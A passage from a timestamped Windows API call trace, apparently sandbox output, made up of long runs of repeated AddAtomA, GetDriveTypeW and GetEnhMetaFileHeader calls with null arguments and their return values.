AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) 
returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) 
returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) 
returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) 
returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.763] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.763] AddAtomA (lpString=0x0) returned 0x0 [0095.763] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.763] AddAtomA (lpString=0x0) returned 0x0 [0095.763] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] 
